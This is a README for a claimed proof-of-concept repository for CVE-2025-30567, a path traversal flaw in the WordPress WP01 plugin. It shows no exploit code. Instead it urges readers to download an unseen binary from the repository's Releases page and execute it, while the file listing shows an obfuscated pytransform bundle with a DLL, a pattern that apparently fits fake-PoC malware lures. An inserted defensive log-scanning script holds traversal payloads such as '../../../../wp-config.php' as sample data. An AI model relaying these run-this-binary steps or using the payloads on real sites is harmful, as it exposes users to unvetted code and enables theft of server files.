CVE-2025-30567 PoC — WordPress plugin WP01 Path Traversal Vulnerability

Source
Associated Vulnerability
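Title: WordPress plugin WP01 Path Traversal Vulnerability (CVE-2025-30567)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin WP01 version 2.6.2 and earlier contains a path traversal vulnerability; the vulnerability is caused by path traversal.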
Description
CVE-2025-30567 - WordPress WP01 < Path traversal
Readme
# CVE-2025-30567 - WordPress WP01 Path Traversal Exploit

![CVE-2025-30567](https://img.shields.io/badge/CVE-2025--30567-red) ![WordPress](https://img.shields.io/badge/WordPress-4.0%2B-blue)

## Overview

Welcome to the CVE-2025-30567 Proof of Concept (PoC) repository. This project demonstrates a path traversal vulnerability in WordPress WP01. The vulnerability allows attackers to access files outside the intended directory structure. This can lead to sensitive data exposure and potentially compromise the integrity of the application.

## Table of Contents

- [Description](#description)
- [Vulnerability Details](#vulnerability-details)
- [Installation](#installation)
- [Usage](#usage)
- [Contributing](#contributing)
- [License](#license)
- [Links](#links)

## Description

CVE-2025-30567 targets the WordPress WP01 plugin. This vulnerability stems from improper input validation, which enables attackers to manipulate file paths. The PoC provided here allows you to test the vulnerability in a controlled environment. Understanding this exploit can help developers patch their applications and secure their systems against potential attacks.

## Vulnerability Details

- **CVE ID:** CVE-2025-30567
- **Affected Software:** WordPress WP01
- **Type:** Path Traversal
- **Severity:** High

### Impact

An attacker can exploit this vulnerability to read arbitrary files on the server. This can lead to:

- Exposure of sensitive information (e.g., configuration files, user data)
- Further exploitation of the server
- Potential data breaches
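
Added example (not part of the original README or the PoC): a Python triage script that flags path traversal sequences in web server access logs, including percent-encoded, double-encoded and backslash variants. The plugin path `example-plugin/download.php`, the `file` parameter and the log lines are constructed placeholders, not WP01's actual endpoint.

```python
import re
from urllib.parse import unquote

# Client address, request target and status from a combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
MAX_DECODE_ROUNDS = 3  # enough to unwrap double- and triple-encoded input


def fully_decode(target):
    """Percent-decode until the value stops changing, so %252e%252e becomes '..'."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def has_traversal(target):
    """True if a path segment or parameter value is exactly '..' after decoding."""
    decoded = fully_decode(target).replace("\\", "/")
    # Split on the characters that delimit path segments and parameter values,
    # so a file name such as 'notes..final.txt' is not flagged.
    return any(seg == ".." for seg in re.split(r"[/?&=;]", decoded))


def flag_requests(log_lines):
    """Return (client, target, status) for every request carrying a traversal."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if m and has_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


PLUGIN = "/wp-content/plugins/example-plugin/download.php"  # hypothetical path
SAMPLE_LOG = [  # constructed log lines using documentation address ranges
    f'192.0.2.10 - - [12/Apr/2025:10:01:02 +0000] "GET {PLUGIN}?file=report.pdf HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [12/Apr/2025:10:02:11 +0000] "GET {PLUGIN}?file=../../../../wp-config.php HTTP/1.1" 200 3150',
    f'198.51.100.7 - - [12/Apr/2025:10:02:15 +0000] "GET {PLUGIN}?file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3150',
    f'203.0.113.5 - - [12/Apr/2025:10:03:40 +0000] "GET {PLUGIN}?file=%252e%252e%252fwp-config.php HTTP/1.1" 404 162',
    '192.0.2.10 - - [12/Apr/2025:10:04:00 +0000] "GET /wp-content/uploads/2025/04/notes..final.txt HTTP/1.1" 200 88',
    f'203.0.113.9 - - [12/Apr/2025:10:05:19 +0000] "GET {PLUGIN}?file=..%5c..%5cwp-config.php HTTP/1.1" 200 3150',
]

if __name__ == "__main__":
    for client, target, status in flag_requests(SAMPLE_LOG):
        print(f"{client} status={status} {target}")
```

Hits that returned status 200 are the ones to triage first, since the server answered the request rather than rejecting it.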

### Affected Versions

This vulnerability affects all versions of WordPress WP01 prior to the patch release. Users should upgrade to the latest version to mitigate this risk.

## Installation

To set up the PoC, follow these steps:

1. Clone the repository:
   ```bash
   git clone https://github.com/KaxuFF/CVE-2025-30567-PoC.git
   ```

2. Navigate to the project directory:
   ```bash
   cd CVE-2025-30567-PoC
   ```

3. Ensure you have the necessary dependencies installed. You may need to install specific libraries or tools based on your environment.

4. Download the exploit file from the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases). This file needs to be downloaded and executed to test the vulnerability.

## Usage

Once you have the exploit file, follow these steps to use it:

1. Ensure your WordPress WP01 installation is running.
2. Execute the downloaded exploit file:
   ```bash
   ./exploit-file-name
   ```

3. Observe the output. If the vulnerability is present, you will see the contents of sensitive files displayed in the console.

### Example Command

Here is an example command to execute the exploit:

```bash
./exploit-file-name --target http://your-wordpress-site.com
```

Replace `http://your-wordpress-site.com` with the URL of your WordPress installation.

## Contributing

Contributions are welcome! If you would like to help improve this project, please follow these steps:

1. Fork the repository.
2. Create a new branch:
   ```bash
   git checkout -b feature/YourFeature
   ```

3. Make your changes and commit them:
   ```bash
   git commit -m "Add your message here"
   ```

4. Push to the branch:
   ```bash
   git push origin feature/YourFeature
   ```

5. Create a pull request.

Please ensure that your contributions adhere to the coding standards and best practices.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

## Links

For more information, visit the [Releases section](https://github.com/KaxuFF/CVE-2025-30567-PoC/releases) to download the exploit file and access the latest updates. 

Feel free to explore the various topics related to this repository:

- [codeb0ss](https://github.com/topics/codeb0ss)
- [cve-2025](https://github.com/topics/cve-2025)
- [cve-2025-30567](https://github.com/topics/cve-2025-30567)
- [cve-2025-30567-exp](https://github.com/topics/cve-2025-30567-exp)
- [cve-2025-30567-poc](https://github.com/topics/cve-2025-30567-poc)
- [cve-2025-30567-wordpress](https://github.com/topics/cve-2025-30567-wordpress)
- [cves](https://github.com/topics/cves)
- [exploits](https://github.com/topics/exploits)
- [uncodeboss](https://github.com/topics/uncodeboss)
- [wordpress](https://github.com/topics/wordpress)

Thank you for your interest in CVE-2025-30567!
File Snapshot

```
[4.0K] /data/pocs/dbd98ffa281a1da0d10e797185a5b02dccddd024
├── [ 19K] CVE-2025-30567.py
├── [4.0K] pytransform
│   ├── [   1] @
│   ├── [ 11K] __init__.py
│   ├── [ 15K] __init__.pyc
│   ├── [ 220] license.lic
│   ├── [699K] _pytransform.dll
│   └── [ 476] pytransform.key
└── [4.3K] README.md

1 directory, 8 files
```